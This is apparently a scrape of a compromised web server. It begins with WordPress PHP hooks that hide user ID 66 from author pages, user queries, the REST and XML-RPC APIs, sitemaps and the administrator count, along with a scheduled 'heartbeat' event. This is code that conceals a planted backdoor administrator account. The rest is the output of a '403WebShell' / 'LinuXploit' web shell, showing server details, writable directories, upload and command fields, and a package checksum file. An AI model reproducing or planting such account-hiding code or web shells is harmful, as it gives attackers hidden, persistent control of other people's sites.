add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/fontconfig.md5sums
fce876683827be434b0dca7b2307f5fe  usr/bin/fc-cache
745567810b69804171856c8ca53ed8b3  usr/bin/fc-cat
a284c4c3070e71b1bd8f5329b6e42277  usr/bin/fc-conflist
da8aa889942fc414941cc7354c6a8d63  usr/bin/fc-list
b449b5ec3e9335a8c363fca71f5ad6ef  usr/bin/fc-match
e2c735d4a757a400cf64ec40ecb50ff9  usr/bin/fc-pattern
c2d10bafe7eddeb943f5082d4f83eea8  usr/bin/fc-query
73cdb05ff181edf97ead3fb59f0b4a88  usr/bin/fc-scan
0a546412924125b280f47a0c2761fdc7  usr/bin/fc-validate
9db8cecf75bc24b11d264121df17c92d  usr/share/apport/package-hooks/source_fontconfig.py
b7bb4466e3e0ff7124171be0af9c53d3  usr/share/doc-base/fontconfig.fontconfig-user
162bf771d5be5490ab345973eb646a4f  usr/share/doc/fontconfig/README.Debian
4648df9e8d6215ae7dd16ce863b16967  usr/share/doc/fontconfig/copyright
8637edee6ad4b943f3214a35eb2adc74  usr/share/doc/fontconfig/fontconfig-user.html
0258297c947589314374ed7fee3fb49b  usr/share/doc/fontconfig/fontconfig-user.pdf.gz
956ec6c5945b1aacd33ea2e9c4fb9eb3  usr/share/doc/fontconfig/fontconfig-user.txt.gz
a7e96131650be77fc0ab1bbcfc7e1a8b  usr/share/man/man1/fc-cache.1.gz
5bef74c7d050a31a94e27352c2b01057  usr/share/man/man1/fc-cat.1.gz
3c9f7a0caf0fff18324683dc9c8df1f1  usr/share/man/man1/fc-conflist.1.gz
91bcceb9fa59a7f4e1dbc5f06c428ea3  usr/share/man/man1/fc-list.1.gz
b4679e71dd9425ed1a3155d1f0b2443f  usr/share/man/man1/fc-match.1.gz
87df2411c5028ab29f082684424b262a  usr/share/man/man1/fc-pattern.1.gz
1b798fe4b3d916a81a6c15e72907acaa  usr/share/man/man1/fc-query.1.gz
f018fb5e5509115c74a79db307501b6b  usr/share/man/man1/fc-scan.1.gz
943ca0a315f3916a4b3ecf4655325944  usr/share/man/man1/fc-validate.1.gz

Youez - 2016 - github.com/yon3zu
LinuXploit